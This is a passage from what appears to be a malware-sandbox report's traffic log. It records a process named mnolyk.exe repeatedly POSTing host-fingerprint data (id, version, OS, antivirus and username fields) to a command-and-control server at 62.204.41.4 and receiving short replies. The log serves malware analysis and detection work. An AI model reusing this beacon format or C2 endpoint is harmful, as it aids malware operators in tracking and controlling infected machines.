                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            617 | 192.168.2.4 | 50312 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:15.535341024 CET | 805 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:15.597728014 CET | 805 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:15 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            618 | 192.168.2.4 | 50313 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:16.587697983 CET | 806 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:16.652751923 CET | 806 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:16 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            619 | 192.168.2.4 | 50314 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:17.451507092 CET | 807 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:17.515319109 CET | 807 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            62 | 192.168.2.4 | 49757 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:41.898386955 CET | 251 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:41.960125923 CET | 251 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            620 | 192.168.2.4 | 50315 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:17.704524994 CET | 808 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:17.767868996 CET | 808 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            621 | 192.168.2.4 | 50316 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:17.940022945 CET | 809 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:18.003640890 CET | 809 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:17 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            622 | 192.168.2.4 | 50317 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:18.173072100 CET | 810 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:18.236695051 CET | 810 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            623 | 192.168.2.4 | 50318 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:18.404660940 CET | 811 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:18.467207909 CET | 811 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            624 | 192.168.2.4 | 50319 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:18.663429022 CET | 812 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:18.728003025 CET | 812 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            625 | 192.168.2.4 | 50320 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:18.911019087 CET | 813 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:18.974771023 CET | 813 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:18 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            626 | 192.168.2.4 | 50321 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:19.144640923 CET | 814 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:19.208740950 CET | 814 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            627 | 192.168.2.4 | 50322 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:19.378355026 CET | 815 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:19.442337036 CET | 815 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            628 | 192.168.2.4 | 50323 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:19.611217976 CET | 816 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:19.678633928 CET | 816 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            629 | 192.168.2.4 | 50324 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:19.866230965 CET | 817 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:19.932579041 CET | 817 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:19 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            63 | 192.168.2.4 | 49758 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:42.136396885 CET | 252 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:42.201607943 CET | 252 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:42 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            630 | 192.168.2.4 | 50325 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:20.110521078 CET | 818 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:20.176888943 CET | 818 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            631 | 192.168.2.4 | 50326 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:20.344532967 CET | 819 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:20.406809092 CET | 819 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            632 | 192.168.2.4 | 50327 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:20.585581064 CET | 820 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:20.650650024 CET | 820 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            633 | 192.168.2.4 | 50328 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:20.835288048 CET | 821 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:20.900088072 CET | 821 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            634 | 192.168.2.4 | 50329 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:40:21.110663891 CET | 822 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:21.171921968 CET | 822 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:21 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            635 | 192.168.2.4 | 50330 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
